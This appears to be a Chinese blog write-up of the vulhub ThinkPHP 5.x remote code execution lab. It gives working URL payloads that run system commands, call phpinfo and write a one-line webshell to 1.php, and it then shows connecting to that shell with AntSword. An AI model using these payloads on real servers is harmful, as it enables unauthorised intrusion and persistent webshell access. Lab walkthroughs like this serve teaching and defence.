Thinkphp5x远程命令执行 靶场攻略

环境配置

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏

POC:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/16753b4fd3bb4544bdb52b2109a6e6f3.png) #### 3.远程代码执行 POC: ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/6a91a4e3c31e4e63a88d3ab5d65d24cf.png) #### 4.写入一句话木马到根目录下的1.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> 1.php ![](https://i-blog.csdnimg.cn/direct/732b49aa73e14b64bf6827488e1fe6d8.png) #### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/400f12233e0e401290c55af68f48328a.png)

相关推荐
e***9857几秒前
Springboot的jak安装与配置教程
java·spring boot·后端
干饭比赛第一名获得者4 分钟前
🚀 终极指南:Mac M4 编译 Rust 至 Linux (AMD64)
后端·rust
qq_2704900965 分钟前
基于SSM的智能校内点餐系统设计与实现
java·eclipse·tomcat·mybatis
骑着bug的coder6 分钟前
以为是 MyBatis Plus 链式调用的“优雅”写法,结果反手给我报了个 NPE?
后端
大道戏9 分钟前
互联网程序设计第12 讲 RMI 程序设计
java·开发语言·计算机网络
w***42416 分钟前
SpringSecurity的配置
android·前端·后端
皖南大花猪17 分钟前
Go 项目中使用 Casbin 实现 RBAC 权限管理完整教程
开发语言·后端·golang·rbac·casbin
源代码•宸19 分钟前
GoLang写一个火星漫游行动
开发语言·经验分享·后端·golang
i***132420 分钟前
【SpringBoot】单元测试实战演示及心得分享
spring boot·后端·单元测试